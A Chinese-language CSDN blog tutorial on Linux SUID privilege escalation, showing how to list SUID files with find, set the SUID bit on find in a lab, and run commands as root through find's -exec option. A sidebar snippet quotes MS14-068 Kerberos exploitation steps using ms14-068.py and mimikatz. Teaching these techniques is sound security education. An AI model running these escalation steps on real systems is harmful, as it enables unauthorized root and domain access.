linux sid提权(保姆级教程)

最新推荐文章于 2024-04-28 13:16:41 发布
最新推荐文章于 2024-04-28 13:16:41 发布
阅读量377 收藏
点赞数
分类专栏: 内网安全 文章标签: linux 运维 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41690468/article/details/130959421
版权

linux提权


linux 提权主要有两种一种是脏牛提权,另外一种比较简单就是sid linux提权。

权限


权限说明
linux的权限主要是有r w x 这三种,也就是读权限,写权限和执行权限
在这里插入图片描述


linux 提权涉及到一个s权限。每当这个文件有s权限的,当运行这个文件时,以文件的拥有者去执行这个文件。

所以我们要知道root用户拥有的具有s的执行权限的文件

寻找s权限的文件

find / -perm -u=s  -type f  2 >/dev/null

说明:

-perm 查询关于权限有关的
例如:
-perm -u=s 查找拥有s权限的文件
-perm -g=w 拥有组写文件的权限

-u=s 查找文件权限中包含s的
-type f 指定类型为文件
2>/dev/null 是将报错信息输出到空,也就是不输出报错信息

案例:

在这里插入图片描述

在这里插入图片描述

ps: 如果不存在find命令存在s权限的话可以使用root用户手动加一下,为了学习(复现)

chmod 4755 /usr/bin/find

提权(以root权限执行命令)


说明:
sr/local/find 随便一个存在的文件 -exec 要执行的命令 ;
如果是不存在的文件的话,前面报错后面想要执行的文件就无法执行。

例如:

/usr/bin/find a.php -exec ls /root \;

这样普通用户就可以 以root身份证执行命令,也就是提权成功。


案例:

在这里插入图片描述

菜鸡学安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS14-068AD域提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local [email protected]位域用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local域这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc [email protected]" exit [email protected]指的是第一步所生成的ccache文件。 3. kerberos::ptc [email protected] 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
suid提权linux
weixin_68652890的博客
04-15 941
suid提权 suid(设置用户的id)是Linux中的一种特殊权限,当运行具有suid权限的二进制文件的时候,使得调用者暂时获得该文件拥有者的权限(比如a文件拥有者是root,且被赋予了s权限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root权限) 除了经常看见的rwx权限还有s权限 s权限,设置使文件在执行阶段具有文件所有者的权限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s权限,就被称为Set UID,简称为SUID的特殊权限。简称为SUID的特殊权
linux权限位的第一位,LINUX s权限位提权
weixin_28358083的博客
05-02 784
我之前写过一篇文件权限与ACL的文章,提到过了权限也提到了s权限位。对s权限没有了解的可以先看下这篇内容。本篇要提到的为root用户的suid,具体可以看下passwd命令对应的权限。如果一些命令给了s权限位以后,是可以进行提权操作。可使用如下命令以root用户执行查看当前具有s权限位的文件:find / -perm -u=s -type f 2>/dev/null一、cp suid 示...
Linux脏牛(CVE-2016-5195)提权保姆教程
weixin_68408599的博客
08-17 1483
对CVE-2016-5159提权保姆教程
Linux 虚拟机注意要点】
qq_59272796的博客
11-06 130
注意事项。
Linux中的UID、GID和SID
Penn Li的博客
11-21 1万+
一、 UID和GID vi /etc/passwd查看用户配置情况 GID 是组ID (Group Identify),表示组的身份唯一标识 UID 是用户ID (User Identify),表示用户身份唯一标识 用户分类 centos6 超用户 UID=0 root 普通用户 UID=500起 oldboy 虚拟用户 UID=1-499 存在满足文件或者服务启动的需要。一般不需要登录;(傀...
The Linux Process Principle, PID、PGID、PPID、SID、TID、TTY
热门推荐
liujianfei526的专栏
01-29 1万+
目录 0. 引言 1. Linux进程 2. Linux进程的相关标识 3. 进程标识编程示例 4. 进程标志在Linux内核中的存储和表现形式 5. 后记 0. 引言 在进行Linux主机的系统状态安全监控的过程中,我们常常会涉及到对系统进程信息的收集、聚类、分析等技术,因此,研究Linux进程原理能帮助我们更好的明确以下几个问题 1. 针对Linux的进程状态,需要监控捕获哪些
linux php 进程进阶(七)sid(会话)
专注于php高级知识分享
06-11 598
说起会话,我们经常登录到linux系统, linux是一个多用户多任务的分时操作系统,必须要支持多个用户同时登陆同一个操作系统,当一个用户登陆一次终端时就会产生一个会话,执行各种各样的程序,这都牵涉到会话。 会话是基于连接的。会话的源头,就是用户与系统之间连接的启用。每个会话有一个会话首进程,即创建会话的进程,建立与终端连接的就是这个会话首进程,也被称为控制进程。一个会话可以包括多个进程组, 这些进程组可被分为一个前台进程组和一个或多个后台进程组。为什么要这么分呢?前台进程组是指需要与终端进行交互的进程组
linux提权参考方法
bobo_milk的博客
11-26 1122
linux提权参考
Linux SID 开发指南
韦东山嵌入式专栏
02-23 1731
SID 提供的功能可以分为四大部分:ChipID、SoC Version、Efuse 功能、一些状态位。在获取Key 的时候,调用者需要知道Key 的名称,以此作为索引的依据。sunxi-sid.h 不是所有key 都能访问,一般可以访问的已经在dts 定义。
D1-H_Linux_SID_开发指南1
08-03
介绍Linux内核中基于Sunxi硬件平台的SID模块驱动的详细设计,为软件编码和维护提供基础。1.2 适用范围内核版本 Linux-5.4 的平台。1.3 相
Linux_SID_开发指南1
08-04
介绍Linux内核中基于Sunxi硬件平台的SID模块驱动的详细设计,为软件编码和维护提供基础。1.2 适用范围1.3 相关人员SID 驱动、Efuse 驱动、
s a s9.4续订更新教程 及 最新SID
09-16
s a s9.4续订更新教程 及 最新SID
sid.rar_Linux/Unix编程_Unix_Linux_
08-11
AppArmor security module driver for linux.
13 Linux实操篇-网络配置
qq_74289024的博客
04-23 1050
子网ip 与网关。
Linux多进程(五) 进程池 C++实现
Lyajpunov的博客
04-26 804
进程池是一种并发编程模式,用于管理和重用多个处理任务的进程。它通常用于需要频繁创建和销毁进程的情况,以避免因此产生的开销。减少进程创建销毁的开销:避免频繁创建和销毁进程所带来的系统资源开销。提高系统响应速度:由于进程已经初始化并且一直保持在内存中,可以立即分配执行任务,减少了任务等待时间。控制资源使用:通过限制进程池中的进程数量,可以控制系统资源的使用情况,避免资源过度消耗。
Linux——web服务配置
Xinan_____的博客
04-23 1134
GET:请求获取指定资源的表示形式。使用GET方法,客户端请求服务器发送某个资源。POST:向指定资源提交数据,用于处理表单提交、文件上传等操作。PUT:向指定资源位置上传其最新内容,用于更新资源。DELETE:请求服务器删除指定资源。HEAD:请求获取与实体相对应的头部信息,用于获取资源的元数据。OPTIONS:请求查询服务器支持的HTTP方法。TRACE:请求服务器回显收到的请求消息,用于测试或诊断。200 OK:请求成功。:永久重定向,请求的资源已经被分配了新的。
Linux:浏览器访问网站的基本流程(优先从先到后)
最新发布
fox_kang的博客
04-28 613
浏览器访问网站的基本流程(优先从先到后) 首先查找浏览器是否存在该网站的访问缓存 其次查找本机的域名解析服务器 windows:C:\Windows\System32\drivers\etc\hosts Linux:/etc/hosts 使用外部的域名解析服务器解析(例如:114.114.114.114) 第一步:浏览器使用域名访问www.bilibili.com.网站 第二步:首先去访问根域名解析服务器查询,根服务器返回.com域名解析服务器地址==(这里的根域名解析服务器不会直接给出域名对应的
Linux 抽象命名空间(Abstract Namespace)简介
日拱一卒,玉汝于成
04-25 592
与传统的 UDS 不同,抽象命名空间并不在文件系统中创建实际文件,而是仅存在于内核内存中,其名称以 localabstract: 作为前缀。在这个例子中,我们创建了一个名为 my_abstract_namespace 的抽象命名空间,并将其绑定到了刚创建的 Unix 套接字上。要在 Linux 系统中生成一个抽象命名空间,通常需要使用编程语言的套接字 API 来创建一个 Unix 域套接字,并将其绑定到一个以 localabstract: 开头的特殊路径。
linux下oracle11g安装教程
06-06
Oracle 11g在Linux系统上的安装过程需要一些特定的步骤。下面是一个简要的安装教程: 1. 准备安装环境: Oracle 11g需要在Linux系统上运行, 并且需要一些特定的系统配置。 2. 下载安装包: 从Oracle官网下载Oracle 11g安装包, 下载完成后, 将其解压到一个目录。 3. 设置环境变量: 使用系统管理员权限编辑.bash_profile文件, 在其中设置ORACLE_HOME, ORACLE_SID等环境变量。 4. 创建数据库: 使用Oracle自带的创建数据库工具DBCA来创建数据库, 创建过程中需要提供一些必要的信息。 5. 完成安装: 安装完成后, 可以使用SQL*Plus连接数据库并执行SQL语句。 注意: 上述步骤只是一个简要的安装教程, 具体安装过程可能因系统环境不同而有所不同。建议在安装前仔细阅读Oracle官方文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值